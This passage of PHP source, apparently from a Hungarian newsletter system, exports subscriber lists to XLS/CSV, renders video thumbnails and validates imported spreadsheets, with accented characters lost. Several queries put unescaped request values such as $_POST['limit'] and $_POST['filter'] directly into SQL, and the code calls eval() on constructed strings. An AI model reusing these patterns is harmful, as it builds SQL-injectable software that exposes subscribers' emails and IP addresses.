			 $objWriter->setDelimiter(";");
			 $objWriter->setEnclosure(\'"\');
			 $objWriter->setLineEnding("\n");
			 $objWriter->setSheetIndex(0);';
    }
		
		/*;
								->setInputEncoding('ISO-8859-2')
						->setDelimiter(';')
						->setEnclosure('"')
						->setLineEnding("\n")
						->setSheetIndex(0)
     */
    include 'PHPExcel/Classes/PHPExcel.php';
    if ($XLS_TP_php) include $XLS_TP_php;
		
		// Create new PHPExcel object
    $objPHPExcel = new PHPExcel();
    $ver = $this->conf_read('ver');
		
		// Set document properties
    $ws_name = substr($gr['name'], 0, 31);
    $objPHPExcel->getProperties()->setCreator("Webgalamb $ver")
      ->setTitle($ws_name)
      ->setSubject("Export file")
      ->setDescription("")
      ->setKeywords("")
      ->setCategory("");


    $objPHPExcel->setActiveSheetIndex(0);

    function xls($x, $y, $v = '')
    {;
    }; 
				
		// klds megkezdse
    $dbx = 4;
    $objPHPExcel->getActiveSheet()->setCellValueExplicitByColumnAndRow(0, 1, __('E-mail cm'));
    $objPHPExcel->getActiveSheet()->setCellValueExplicitByColumnAndRow(1, 1, __('IP cm'));
    $objPHPExcel->getActiveSheet()->setCellValueExplicitByColumnAndRow(2, 1, __('Feliratkozs ideje'));
    $objPHPExcel->getActiveSheet()->setCellValueExplicitByColumnAndRow(3, 1, __('Sttusz'));
    $objPHPExcel->getActiveSheet()->setCellValueExplicitByColumnAndRow(4, 1, __('ID'));
    if ($aid) {
      $objPHPExcel->getActiveSheet()->setCellValueExplicitByColumnAndRow(5, 1, __('Kattints idpontja'));
      $dbx++;
    }

    if ($mid) {
      $objPHPExcel->getActiveSheet()->setCellValueExplicitByColumnAndRow(5, 1, __('Kikldve'));
      $dbx++;
    }
    if ($read == 1 && $mid) {
      $objPHPExcel->getActiveSheet()->setCellValueExplicitByColumnAndRow(6, 1, __('Elolvasva'));
      $dbx++;
    }

    if ($aid) {
      $objPHPExcel->getActiveSheet()->setCellValueExplicitByColumnAndRow(7, 1, __('Kattintva'));
      $dbx++;
    }
		//xls(0, $dbx+1, 'ID'), $format_bold); $dbx++;
		//xls(0, $dbx+1, 'Verify'), $format_bold); $dbx++;
    $db = $c = $h = 0;
		
		// plussz mezk felvitele:
    $sql_fields = $this->mq("select * from `".DB_PREFIX."fields` where g='$g' order by hely");
    $fields_array = array();
    while ($s = mysql_fetch_array($sql_fields)) {
      if (($gr['email_field'] == $s['id']) || ($gr['email2_field'] == $s['id'])) continue;
      $db++;
      $fields_array[$s['id']] = $db;
      $tp = $s['type'];
      $tp = $this->tp($tp);
       
			 //if($tp) $s['name'].='{{'.$tp.'}}';
      $objPHPExcel->getActiveSheet()->setCellValueExplicitByColumnAndRow($db + $dbx, 1, $s["name"]);
    }

    $db = 0;
    $f_a = array();
    global $minta;
		//$sql=$this->mq("select * from `".DB_PREFIX."users` where `g`='$g' and a=1 order by name".($_POST['limit']?" limit $_POST[limit]":''));
    while ($s = $statxy = mysql_fetch_array($sql)) {
      if ($minta) break;
      if ($mid || $aid) $s = $this->m_array("select * from `".DB_PREFIX."users` where id='$s[uid]'");
      if (!$s) $s = array('name' => __('leiratkozott olvas'), 'mail' => '-', 'ip' => '-', 'datum' => '-', 'active' => '0');
      $db++;
      $dbh = 5;
      $objPHPExcel->getActiveSheet()->setCellValueExplicitByColumnAndRow(0, $db + 1, $s["mail"]);
      $objPHPExcel->getActiveSheet()->setCellValueExplicitByColumnAndRow(1, $db + 1, $s["ip"]);
      $objPHPExcel->getActiveSheet()->setCellValueExplicitByColumnAndRow(2, $db + 1, $s["datum"]);
      $objPHPExcel->getActiveSheet()->setCellValueExplicitByColumnAndRow(3, $db + 1, $s["active"] ? ($s["active"] == 2 ? __('Visszapattant') : __('Aktv')) : __('Inaktv'));
      $objPHPExcel->getActiveSheet()->setCellValueExplicitByColumnAndRow(4, $db + 1, $s["id"]);
      if ($mid) {
        $objPHPExcel->getActiveSheet()->setCellValueExplicitByColumnAndRow(5, $db + 1, date('Y-m-d', $statxy['date']));
        $dbh = 7;
      }
      if ($read == 1 && $mid) {
        $objPHPExcel->getActiveSheet()->setCellValueExplicitByColumnAndRow(6, $db + 1, $statxy['stat']);
        $dbh = 8;
      }
      if ($aid) {
        $objPHPExcel->getActiveSheet()->setCellValueExplicitByColumnAndRow(5, $db + 1, $statxy['stat']);
      }
			
			//xls($db, $dbh-1, $s["id"])); 
			//xls($db, $dbh, $s["verify_code"])); 

      $id = $s['id'];
      $s_q = "SELECT 
					 ".DB_PREFIX."users.g as g,
			     ".DB_PREFIX."fields.id as vidid,
			     ".DB_PREFIX."fields.type as type, 
			     ".DB_PREFIX."fields_data.text as text,
					 ".DB_PREFIX."fields_data.int_text as int_text,
					 ".DB_PREFIX."fields_data.`date` as `date` 
			  FROM 
				   ".DB_PREFIX."fields_data, 
					 ".DB_PREFIX."users, 
					 ".DB_PREFIX."fields 
			  WHERE 
				  ".DB_PREFIX."fields.id=".DB_PREFIX."fields_data.did and 
					".DB_PREFIX."fields_data.un='$id' and 
					".DB_PREFIX."users.id='$id' order by ".DB_PREFIX."fields.hely";
			
			//die($s_q);		
      $sq2 = $this->mq($s_q);
      if ($c) $h = 1;

      while ($s2 = mysql_fetch_array($sq2)) {
        if ($s2['g'] != $g) continue;
        if ($s2['type'] > 1) {
          if (!isset($f_a[$s2['vidid']])) {
            $f_a[$s2['vidid']] = array();
            $x = $this->mq("select * from `".DB_PREFIX."fields_fields` where field_id='$s2[vidid]'");
            while ($x2 = mysql_fetch_assoc($x)) $f_a[$s2['vidid']][$x2['id']] = $x2['name'];
          }

          if (!isset($fields_array[$s2['vidid']])) $fields_array[$s2['vidid']] = '';

          if (($s2['type'] == 2 || $s2['type'] == 4) && $s2['int_text']) {
            if (!isset($f_a[$s2['vidid']][(int)($s2['int_text'])])) $f_a[$s2['vidid']][(int)($s2['int_text'])] = '';
            $objPHPExcel->getActiveSheet()->setCellValueExplicitByColumnAndRow($fields_array[$s2['vidid']] + $dbx, $db + 1, $f_a[$s2['vidid']][(int)($s2['int_text'])]);
          }

          if ($s2['type'] == 5)
            $objPHPExcel->getActiveSheet()->setCellValueExplicitByColumnAndRow($fields_array[$s2['vidid']] + $dbx, $db + 1, ($s2['date']));

          if ($s2['type'] == 6)
            $objPHPExcel->getActiveSheet()->setCellValueExplicitByColumnAndRow($fields_array[$s2['vidid']] + $dbx, $db + 1, (int)($s2['int_text']));


          if ($s2['type'] == 3 && $s2['text']) // chex -- tbbet is kijellhet
          {
            $tomb = explode(';', $s2['text']);
            $str = '';
            foreach ($tomb as $v) if ((int)($v)) $str .= $f_a[$s2['vidid']][(int)($v)] . '; ';
            $objPHPExcel->getActiveSheet()->setCellValueExplicitByColumnAndRow($fields_array[$s2['vidid']] + $dbx, $db + 1, $str);
          }
        } elseif ($s2['text']) $objPHPExcel->getActiveSheet()->setCellValueExplicitByColumnAndRow($fields_array[$s2['vidid']] + $dbx, $db + 1, str_replace(array("\r\n", "\n"), array(' ', ' '), $s2['text']));
      }
		// if($db > 50) break;
    }
		
		//$xls->xls_vege();

    $ws_name = substr($g_dashed, 0, 31);

    eval($XLS_save_eval);
    $objWriter->save('php://output');

    exit;
  }
}

function csv_generate($g, $mid = 0, $type = '', $read = '', $fn = '', $aid = 0)
{
  global $lang_wg2;
  if ($g) {
    @error_reporting(0);
    @set_time_limit(0);
    if (isset($_POST['limit'])) {
      $a = explode('|', $_POST['limit']);
      $_POST['limit'] = $a[0];
      $xs = '_' . $a[1];
    } else {
      $_POST['limit'] = '';
      $xs = '';
    }

    if ($mid) {
      $sqlq = "Select * from `".DB_PREFIX."stat` where mid='$mid' " . ($type != '' ? " and type='$type'" : '') . ($read ? ($read == 2 ? " and `stat`='0000-00-00'" : " and `stat`!='0000-00-00'") : '') . ($_POST['limit'] ? " limit $_POST[limit]" : '');
      $sql = $this->mq($sqlq);
    } elseif ($aid) {
      $sqlq = "Select * from `".DB_PREFIX."act_stat` where aid='$aid' and stat!='0000-00-00'" . ($_POST['limit'] ? " limit $_POST[limit]" : '');
      $sql = $this->mq($sqlq);
    } elseif ($_POST['filter']) {
      $_GET['g'] = $g;
      $filter = $this->m_array("select * from `".DB_PREFIX."filters` where id='$_POST[filter]'");
      $t_x = $this->reszletes_kereso(unserialize($filter['data']));
      $q = $t_x['q'];
      $fd = $t_x['fd'];;
      $sql = $this->mq("select * from `".DB_PREFIX."users` as us where a=1 and g='$_POST[g]'$q order by id" . ($_POST['limit'] ? " limit $_POST[limit]" : ''));
    } else {
      $sql = $this->mq("select * from `".DB_PREFIX."users` where `g`='$g' and a=1 order by id" . ($_POST['limit'] ? " limit $_POST[limit]" : ''));
		  //echo"select * from `".DB_PREFIX."users` where `g`='$g' and a=1 order by id".($_POST['limit']?" limit $_POST[limit]":'');
		  //die();
    }

    $gr = $this->m_array("select * from `".DB_PREFIX."groups` where id='$g'");
    $g_dashed = $this->dash($gr['name']);
    if ($fn) $g_dashed = $fn . '_stat';

    $group = $gr['name'];
    $xls = new tg_xls_writer();

    $xls->downloading("{$g_dashed}{$xs}.csv");
		// klds megkezdse
    $data = '';
		//$data.= $xls->csv_conv(('Nv'));
    $data .= $xls->csv_conv($this->convert_utf8_to_iso(__('E-mail cm')));
    $data .= $xls->csv_conv($this->convert_utf8_to_iso(__('IP cm')));
    $data .= $xls->csv_conv($this->convert_utf8_to_iso(__('Feliratkozs ideje')));
    $data .= $xls->csv_conv($this->convert_utf8_to_iso(__('Sttusz')));
    $data .= $xls->csv_conv($this->convert_utf8_to_iso(__('ID')));
    if ($aid) {
      $data .= $xls->csv_conv($this->convert_utf8_to_iso(__('Kattints idpontja')));
    }
    if ($mid) $data .= $xls->csv_conv($this->convert_utf8_to_iso(__('Kikldve')));
    if ($read == 1 && $mid) $data .= $xls->csv_conv($this->convert_utf8_to_iso(__('Elolvasva')));
    if ($aid) $data .= $xls->csv_conv($this->convert_utf8_to_iso(__('Kattintva')));
    $db = $c = $h = 0;
		
		// plussz mezk felvitele:
    $sql_fields = $this->mq("select * from `".DB_PREFIX."fields` where g='$g' order by hely");
    $fields_array = array();
    while ($s = mysql_fetch_array($sql_fields)) {
      if (($gr['email_field'] == $s['id']) || ($gr['email2_field'] == $s['id'])) continue;
      $db++;
      $fields_array[] = $s;
      $tp = $s['type'];
      $tp = $this->tp($tp);
       
			 //if($tp) $s['name'].='{{'.$tp.'}}';
      $data .= $xls->csv_conv($this->convert_utf8_to_iso($s["name"]));
    }

    $db = 0;
    $f_a = array();

    while ($s = $statxy = mysql_fetch_array($sql)) {
      if ($mid || $aid) $s = $this->m_array("select * from `".DB_PREFIX."users` where id='$s[uid]'");
      if (!$s) $s = array('name' => __('leiratkozott olvas'), 'mail' => '-', 'ip' => '-', 'datum' => '-', 'active' => '0');
      $db++;
      if ($data) {
        echo substr($data, 0, strlen($data) - 1);
        echo "\n";
      }
      $data = '';
			//$data.= $xls->csv_conv($this->convert_utf8_to_iso($s["name"]));
      $data .= $xls->csv_conv($this->convert_utf8_to_iso($s["mail"]));
      $data .= $xls->csv_conv($this->convert_utf8_to_iso($s["ip"]));
      $data .= $xls->csv_conv($this->convert_utf8_to_iso($s["datum"]));
      $data .= $xls->csv_conv($this->convert_utf8_to_iso($s["active"] ? ($s["active"] == 2 ? __('Visszapattant') : __('Aktv')) : __('Inaktv')));
      $data .= $xls->csv_conv($this->convert_utf8_to_iso($s["id"]));
      if ($mid) {
        $data .= $xls->csv_conv($this->convert_utf8_to_iso(date('Y-m-d', $statxy['date'])));
      }
      if ($read == 1 && $mid) $data .= $xls->csv_conv($this->convert_utf8_to_iso($statxy['stat']));
      if ($aid) $data .= $xls->csv_conv($this->convert_utf8_to_iso($statxy['stat']));


      $id = $s['id'];
      if ($c) $h = 1;      foreach ($fields_array as $s2) {

        $fd = $this->m_array("select * from ".DB_PREFIX."fields_data where un='$s[id]' and did='$s2[id]'");
        if ($s2['type'] > 1) {
          if (!isset($f_a[$s2['id']])) {
            $f_a[$s2['id']] = array();
            $x = $this->mq("select * from `".DB_PREFIX."fields_fields` where field_id='$s2[id]'");
            while ($x2 = mysql_fetch_assoc($x)) $f_a[$s2['id']][$x2['id']] = $x2['name'];
          }

          if (($s2['type'] == 2 || $s2['type'] == 4)) {
            if ($fd['int_text']) $data .= $xls->csv_conv($this->convert_utf8_to_iso($f_a[$s2['id']][(int)($fd['int_text'])]));
            else $data .= ';';
          }

          if ($s2['type'] == 5)
            $data .= $xls->csv_conv($this->convert_utf8_to_iso(($fd['date'])));

          if ($s2['type'] == 6)
            $data .= $xls->csv_conv($this->convert_utf8_to_iso((int)($fd['int_text'])));


          if ($s2['type'] == 3) // chex -- tbbet is kijellhet
          {
            $tomb = explode(';', $fd['text']);
            $str = '';
            foreach ($tomb as $v) if ((int)($v)) $str .= $f_a[$s2['id']][(int)($v)] . '; ';
            $data .= $xls->csv_conv($this->convert_utf8_to_iso($str));
					  //if(!$str) $data.=';';
          }
        } else//if($fd['text']) 
        {
          $data .= $xls->csv_conv($this->convert_utf8_to_iso(str_replace(array("\r\n", "\n"), array(' ', ' '), $fd['text'])));
				  //if(!$fd['text']) $data.= ';';
        }
      }
    }

  }

  echo $data;
  echo "\n";
	/*if($data) 
	 {
	 echo substr($data, 0, strlen($data)-1);
	 echo "\n";
	 }
   */
  exit;
}


function videoimage($tp, $id, $file)
{
  if ($tp == 'youtube')
    $image_url = "http://img.youtube.com/vi/{$id}/0.jpg";

  if ($tp == 'vimeo') {
    $tisztareturn = @file_get_contents("http://vimeo.com/api/v2/video/$id.json");
    $tisztareturn = substr($tisztareturn, strpos($tisztareturn, '[{'));

    $image_url = json_decode($tisztareturn, true);

    if (!$image_url)
      echo __("Hibs a megadott vimeo link, vagy a linken nem tallhat vide");

    $image_url = $image_url[0]['thumbnail_large'];
  }

  if (!$image_url || !$file) return false;

  $image = @file_get_contents($image_url);
				 // $this->download($image_url);
				 //http://vimeo.com/15887012

  if (!$image) {
    echo __('Nem sikerlt az elnzeti kp letltse, ellenrizd a linket.');
    return false;
  }

  $image = imagecreatefromstring($image);

  $destination_x = (imagesx($image) / 2) - 100;
  $destination_y = (imagesy($image) / 2) - 80;

				// Load the play button image.
  $play_button_image = imagecreatefrompng('../static/img/play-button-overlay.png');
  imagealphablending($play_button_image, true); // Preserve transparency.
  imagealphablending($image, true); // Preserve transparency.

				// Use imagecopy() to place the play button over the image.
  imagecopy(
    $image, // Destination image.
    $play_button_image, // Source image.
    $destination_x, // Destination x coordinate.
    $destination_y, // Destination y coordinate.
    0, // Source x coordinate.
    0, // Source y coordinate.
    200, // Source width.
    160 // Source height.
  );

  imagejpeg($image, $file);
  imagedestroy($image);
				 
				 /*
				 				
				$fp = fopen($file, 'w');
				fwrite($fp,$image);
				fclose($fp);*/
  return true;
}
	
	
   // XLS import rsz
function datafile_upl($file, $oszlop)
{
  global $txt_processing_start;
  $tp = $_FILES[$file]['type'];
  $knyvt = is_dir('files/') ? 'files/feltolt' : '../files/feltolt';
  if (!$_POST['g']) return __('Nincs csoport kivlasztva!');
  $kit = '.' . pathinfo($_FILES[$file]['name'], PATHINFO_EXTENSION); /*strtolower(substr($_FILES[$file]['name'], strlen($_FILES[$file]['name'])-4));*/
		
		//if (!($kit=='.csv' || $kit == '.xls' || $kit == '.ods' || $kit == '.ots' || $kit == '.xlsx')) return __('Hibs fjlformtum!').'<br />'.__('Kizrlag .xls, .xlsx, s .csv kiterjeszts fjl tlthet fel!');
  if (!($kit == '.csv' || $kit == '.xls')) return __('Hibs fjlformtum!') . '<br />' . __('Kizrlag a kvetkez kiterjeszts fjlok tlthetek fel:') . '<br />.xls, .csv';
  if (!$_FILES[$file]['size'] > 16024000) return __("Maximum 16MB-os fjl tlhet fel!");


  if (is_uploaded_file($_FILES[$file]['tmp_name']) && $_POST['g']) @move_uploaded_file($_FILES[$file]['tmp_name'], $knyvt . $kit);
  else return __("Valami problma addott a fjl feltltse kzben!");

  if (!is_file($knyvt . $kit)) return __("Nem rem el a feltlttt fjlt. Valsznleg nem megfelelek a mappa jogosultsgai");
		
		 /* if($kit=='.csv' || $kit == '.xls' || $kit == '.ods' || $kit == '.ots' || $kit == '.xlsx' || $kit=='.xml')
		 $txt_processing_start = "
			<script language=\"javascript\">
			var text = '<div id=\"window_tartalom2\"><h1 class=\"pirosh1\"><center>" . __('Krlek vrj, fjl ellenrzs folyamatban!') . 
			"</center></h1></div>';
			elohoz_n(text, true);
			$('#window_tartalom2').load(url, {g: $_GET[g], csv_check: 1, exp: '$kit', update_time: $_POST[update_time]});
			</script>";
			
   */


  if ($kit == '.csv' || $kit == '.xls' || $kit == '.ods' || $kit == '.ots' || $kit == '.xlsx') {
    $txt_processing_start = "
			<script language=\"javascript\">
			var text = '<div id=\"window_tartalom2\"><h2 class=\"text-center\">" . __('A fjl feldolgozsa folyamatban!') . "</h2><p class=\"text-center\">" . __('A folyamat a lista hossztl fggen nhny percet vesz ignybe.') . "</p></div>';
			elohoz_n(text, true);

			$('#window_tartalom2').load(url, {g: $_GET[g], xls_converz: 1, exp: '$kit', update_time: $_POST[update_time]}); </script>";
  }


}

function is_utf8($str)
{
  return (preg_match(
    "/^([\x09\x0A\x0D\x20-\x7E]|[\xC2-\xDF][\x80-\xBF]|\xE0[\xA0-\xBF][\x80-\xBF]|[\xE1-\xEC\xEE\xEF][\x80-\xBF]{2}|\xED[\x80-\x9F][\x80-\xBF]|\xF0[\x90-\xBF][\x80-\xBF]{2}|[\xF1-\xF3][\x80-\xBF]{3}|\xF4[\x80-\x8F][\x80-\xBF]{2})*$/",
    $str
  )) ? true : false;
}


function _json_decode($str)
{
  return explode('|||||;;;S3P4R47OR;;|||||', $str);
}

function _json_encode($array)
{
  return implode('|||||;;;S3P4R47OR;;|||||', $array);
}

function getcsv($file, $sp)
{
  global $file_pointer;

  if (feof($file)) return false;
  $sor = '';
  while (!feof($file)) {
    $ch = fread($file, 1);
    if ($ch == "\n") break;
    $sor .= $ch;
  }

  $_SESSION['file_pointer'] = ftell($file);

  if (!$sor) return false;
  return $this->csvr(($sor), $sp);
}

function utf8_encode_array($arr)
{
  foreach ($arr as $k => $v)
    $arr[$k] = utf8_encode($v);
  return $arr;
}


function xls_to_csv($g, $pid, $kit)
{
  

  $inputFileName = WG_PATH."files/feltolt$kit";  if (!$g || !$pid) return __('Hibs fggvny hasznlat.');

  $chf = $this->conf_read("chmod_file");
  if ($chf > 100 && $chf <= 777) {
    $e = "chmod('$inputFileName', 0" . (int)($chf) . ");";
    eval($e);
  }

  if ($kit == ".csv") {
    $handle = fopen($inputFileName, "r");
    $row = 0;
    while (($data = $this->getcsv($handle, ";")) !== false) // 2. sortl nzzk }
    {
      $row++;

      $temp_s = $this->_json_encode($data);
      $utf8 = $this->is_utf8($temp_s);
      if (!$utf8 && !isset($utf8set)) {
        $utf8set = 1;
        mysql_query("set character set latin2");
        mysql_query("SET NAMES latin2");
      }
      $temp_s = mysql_real_escape_string($temp_s);
      $this->mq("insert into `".DB_PREFIX."import` (`g`, `pid`, `row`, `x`) values ('$g', '$pid', '$temp_s', '$row')");
    }
    fclose($handle);
		unlink($inputFileName);
    return;
  }

  if (!is_file($inputFileName))
    return __('Valami hiba trtnt a fjl feltltse kzben. Ellenrizd a files mappa jogosultsgt! (' . ($inputFileName) . ')');

  if (is_file($inputFileName) && $g) {
			//	echo 'fj ltezik';

    require('ExcelReader/php-excel-reader/excel_reader2.php');
    require('ExcelReader/SpreadsheetReader.php');

    date_default_timezone_set('UTC');

    $StartMem = memory_get_usage();
    $Spreadsheet = new SpreadsheetReader($inputFileName);
    $BaseMem = memory_get_usage();

    $Sheets = $Spreadsheet->Sheets();

    $tmp_sql = '';
    $i = 1;
    foreach ($Sheets as $Index => $Name) {
      $Spreadsheet->ChangeSheet($Index);

      foreach ($Spreadsheet as $Key => $Row) {
        if (!implode('', $Row)) continue;

        $temp_s = $this->_json_encode($Row);
        $utf8 = $this->is_utf8($temp_s);
        if (!$utf8 && !isset($utf8set)) {
          $utf8set = 1;
          mysql_query("set character set latin2");
          mysql_query("SET NAMES latin2");
        }
        $temp_s = mysql_real_escape_string($temp_s);


        $tmp_sql .= ($tmp_sql ? ",\r\n" : '') . "('$g', '$pid', '$temp_s', '$Key')";
        if (!($i++ % 500)) {
          $this->mq("insert into `".DB_PREFIX."import` (`g`, `pid`, `row`, `x`) VALUES $tmp_sql");
          $tmp_sql = '';
        }
      }
    }

    if ($tmp_sql) {
      $this->mq("insert into `".DB_PREFIX."import` (`g`, `pid`, `row`, `x`) VALUES $tmp_sql");
    }

    unlink($inputFileName);
  }
}

function txt_check($now_time, $kit)
{
  global $file_pointer;
  $t_1 = time();
  $out = '';
  $g = $_POST['g'];
  $pid = $_POST['pid'];

  $highestRow = $this->m_array("select count(`id`) as c from `".DB_PREFIX."import` where g='$g' and pid = '$pid'", 'c');


  $row = $this->m_array("select * from `".DB_PREFIX."import` where g='$g' and pid = '$pid' order by id", 'row');
  $data = $this->_json_decode($row);

  if (!$data) return __("Mr az els oszloppal baj van, vagy nincs is meg!");

  foreach ($data as $cols) {
    $j++;
    $numcols++;
		//echo $cols;
		//echo "<br>\r\n";
    $_NEV = mysql_real_escape_string(($cols));
    $tp = $this->inv_tp($_NEV, 1);
    $_NEV = $tp['str'];
    $tp = $tp['tp'];
    $sql = $this->mq("select * from ".DB_PREFIX."fields where g='$g' and name='" . $_NEV . "'");
    $err_a[] = mysql_real_escape_string(($cols));

    if ($cols == (__('Feliratkozs ideje'))) {
      $c[$j] = 'datum';
      $tim = $j;
    } elseif ($cols == (__('IP cm'))) {
      $c[$j] = 'ip';
      $ip = $j;
    } elseif ($cols == (__('E-mail cm')) ||
      strtolower($cols) == (strtolower(__('E-mail'))) ||
      strtolower($cols) == (strtolower(__('Email')))) {
      $c[$j] = 'mail';
      $mail = $j;
    } elseif ($cols == (__('Sttusz'))) {
      $c[$j] = 'active';
      $status_id = $j;
    } elseif (mysql_num_rows($sql)) { // h J Mez, de mr ltezik akkor hozzasduk a szmt
      $s = mysql_fetch_array($sql);
      $c[$j] = intval($s['id']);

      $tipus[$j] = $s['type'];
/* -------------- */ if ($tp) $tipus[$j] = $tp;
					//megnzzk milyen tpus
      if ($s['type'] > 1 && $s['type'] < 5) // beolvassuk a mezket.
      {
        $m_sql = $this->mq("select * from ".DB_PREFIX."fields_fields where field_id='$s[id]' order by CHAR_LENGTH(name) desc");
        $fields[$s['id']] = array();
        while ($m_s = mysql_fetch_assoc($m_sql)) $fields[$s['id']][$m_s['id']] = $m_s['name'];
      }
    } elseif ($cols) // ha viszont nem ltezik benne, akkor krelunk s persze van abba az oszlopba valami
    {
      $id = $this->a_i("".DB_PREFIX."fields");;
      $c[$j] = intval($id);
      if ($tp) $tipus[$j] = $tp;
    }
  }

  $q = array_count_values($err_a);
  $tobb = '';


  foreach ($q as $k => $v) if ($v > 1) $tobb .= __('Ez az oszlop tbbszr is szerepel: ') . $k . '<br />';
  if ($tobb) $hiba = $tobb;
  else $hiba = '';

  $_g = $this->m_array("select * from ".DB_PREFIX."groups where id='$g'");
  $e_data = $db_users = 0;
		// megnzzk minden mez megan e
		
		//if(!$name) $hiba.='<br>#1. sor > <b>Nv</b> mez hinyzik';
  if (!$mail) $hiba .= "<br>" . __('E-mail cm') . __(' mez hinyzik');

  if ($hiba) {
    $hiba .= '<br /><br /> ' . __('Az ellenrzs nem folytathat.');
    if (is_file($inputFileName))
      unlink($inputFileName);
    return $hiba;
  }

  $xrow = 2;
		// most megnzzk az adatokat
  if (isset($_POST['kezd'])) $j = $_POST['kezd'];
  else $j = 1;
  if (isset($_POST['fp'])) $xrow = $_POST['fp'];


  for ($row = $xrow; $row <= $highestRow; $row++) // 2. sortl nzzk }
  {

    $data = $this->_json_decode($this->m_array("select * from `".DB_PREFIX."import` where x='$row' and g='$g' and pid = '$pid' order by id", 'row'));

    $j++;
    $m = str_replace(array(' ', chr(194), chr(160), "\r", "\n", "\n"), '', ($data[$mail - 1]));
    $t = ($data[$tim - 1]);
    $ip_v = ($data[$ip - 1]);
    $s_x = ($data[$status_id - 1]);

    if ($status_id) {
      if ($s_x == __('Visszapattant')) $s_x = '2';
      elseif ($s_x == __('Inaktv')) $s_x = '0';
      elseif ($s_x == __('Aktv')) $s_x = '1';
      elseif ($s_x == '') $s_x = '1';
      else $hiba .= "<br />" . sprintf(__('#%1$s. sor %2$s. oszlop'), $j, $status_id) . " -> " . __("Ismeretlen sttusz") . ": <b>" . $s_x . "</b>";
    }

    $t2 = $t;
    $t = str_replace('.', '-', $t);
    if ($a = preg_match("/^([0-9]{2})[\/]*([0-9]{2})[\/]*([0-9]{4})$/", $t, $b))
      $t = "$b[3]-$b[1]-$b[2]";
				 
				 
				//dtum ellenrzse
    if (!$t) $t = date("Y-m-d");
    if ($now_time && !preg_match("/^[0-9]{4}[-]*[0-9]{2}[-]*[0-9]{2}$/", $t)) {
      if (!$tim) $tim = sprintf(__("ismeretlen vagy hinyz %s oszlop"), "<i>" . __('Feliratkozs ideje') . "</i>");
      $hiba .= "<br />" . sprintf(__('#%1$s. sor %2$s. oszlop'), $j, $tim) . " -> " . __("Hibs dtumformtum (helyes: 1985-05-02)") . ": <b>" . $t2 . "</b>";
    }
				
				
				//e-mail cm ellenrzs
    if (!$this->isValidEmail($m)) {
      $e_data++;
      $error = 1;
      $hiba .= "<br />" . sprintf(__('#%1$s. sor %2$s. oszlop'), $j, $mail) . " -> " . __("Hibs e-mail cm") . ": <b>" . $m . "</b>";
    } else // nincs hiba
    {
      $db_users++;
      $id = 0;

      if (!$ip_v) $ip_v = $_ip;
      $m = addslashes($m);
					//egyb adatok beszrsa

      for ($i = 1; $i <= $numcols; $i++) {
        if (is_int($c[$i]) && isset($data[$i - 1])) {
          $cols_string = $cols_string2 = (addslashes($data[$i - 1]));

							 // dtum s szm ellenrzs
          if ($tipus[$i] == 5 && $cols_string) {
									//date('Y-m-d', (41381 - 25569) * 86400);
            if (!$cols_string) $cols_string = '0000-00-00';

            if ((!preg_match("/^[0-9]{4}[-]*[0-9]{2}[-]*[0-9]{2}$/", $cols_string)) && (!preg_match("/^([(0-9]+)?$/", $cols_string))) {// && !preg_match("/^([(0-9]+)?$/", $cols_string)) {
              if (preg_match("/^([(0-9]+)?$/", $cols_string)) {
                $exc_date = (int)($cols_string);
                $cols_string = date('Y-m-d', ($exc_date - 25569) * 86400);
              }

              $hiba .= "<br />" . sprintf(__('#%1$s. sor %2$s. oszlop'), $j, $i) . " -> " . __("Hibs dtumformtum (pl: 2009-03-07)") . ": <b>" . $cols_string . "</b>";
            }
          } elseif ($tipus[$i] == 6 && $cols_string) {
            if (!preg_match("/^([(0-9]+)?$/", $cols_string)) {
              $hiba .= "<br />" . sprintf(__('#%1$s. sor %2$s. oszlop'), $j, $i) . " -> " . __("Hibs szmformtum") . ": <b>" . $cols_string . "</b>";
            }
          } elseif ($tipus[$i] == 3 && $cols_string) // checkbox
          {
            $cols_string = str_replace('; ', ';', $cols_string);
            $arr = explode(';', str_replace('; ;', ';', ($cols_string . ';')));
            $field_id = $c[$i];
            foreach ($arr as $v0) {
              if (!$v0) continue;
              $_van = 0;

              if (is_array($fields[$field_id]))
                foreach ($fields[$field_id] as $k => $v) {
                if ($v == $v0) {
                  $_van = 1;
                  break;
                }
              }
              if (!$_van) $hiba .= "<br />" . sprintf(__('#%1$s. sor %2$s. oszlop'), $j, $i) . " -> "
                . __("Hibs checkbox rtk") . ": <b>" . $v0 . "</b>";
            }
            continue;
          }								  
							  
								//$fields[$s['id']]
          $field_id = $c[$i];
          if (!isset($fields[$field_id])) $fields[$field_id] = '';
          if (is_array($fields[$field_id])) // ha az adott mezbe cuccok vanak:
          {
            reset($fields[$field_id]);
            foreach ($fields[$field_id] as $k => $v) {
              $cols_string = str_replace($v . ';', '', $cols_string);
              $cols_string = str_replace($v, '', $cols_string);
            }

            if (str_replace(' ', '', $cols_string)) $hiba .= "<br />" . sprintf(__('#%1$s. sor %2$s. oszlop'), $j, $i) . " -> " . __("Hibs adat") . ": <b>" . $cols_string2 . "</b> -> " . __('hibs rsz') . ": " . $cols_string;
          }
        }
      }
    }

    if (time() - $t_1 > 8) {
				 // echo 'ki kellebne lpni';
      if (!isset($_SESSION['hibapl'])) $_SESSION['hibapl'] = '';
      $_SESSION['hibapl'] .= $hiba;

      echo '
			  <script>
				var text = \'<div id="window_tartalom2"><h2 class="text-center">' . __('Fjl ellenrzse folyamatban!') . '</h2><p class="text-center>' . sprintf(__('%s sor ellenrizve'), $j) . '</p></div>\';
				elohoz_n(text, true);

			  $(\'#window_tartalom2\').load(url, {g: ' . $_POST['g'] . ', csv_check: 1, pid:\'' . $pid . '\', update_time: ' . $_POST['update_time'] . ', fp: ' . $row . ', kezd: ' . $j . '});
			  </script>';
      exit;
    }
  }
//  fclose($handle);
  $t_2 = time();
  if (is_file($inputFileName) && $hiba) unlink($inputFileName);
  if (isset($_SESSION['hibapl'])) $hiba = $_SESSION['hibapl'] . $hiba;
  return $hiba ? $hiba . "<br /><br />" . sprintf(__('Az ellenrzs %s msodpercet vett ignybe'), ($t_2 - $t_1)) : false;

}


function txt_processing($kit, $g_id)
{
  
  global $Referer_nev;
  $t_1 = time();
  $out = '';
  $g = $_POST['g'];
  $_ip = $this->getip();
  $updated = $j = $numcols = 0;

  $g = $_POST['g'];
  $pid = $_POST['pid'];
  $ref_id = $this->m_array("select * from `".DB_PREFIX."fields` where name='$Referer_nev' and g='$g_id'", 'id');
		// adatcsere:
  $tim = $ip = $name = $mail = $status_id = '';

  $inputFileName = "../files/feltolt$kit";
		//return $inputFileName;


  $highestRow = $this->m_array("select count(`id`) as c from `".DB_PREFIX."import` where g='$g' and pid = '$pid'", 'c');
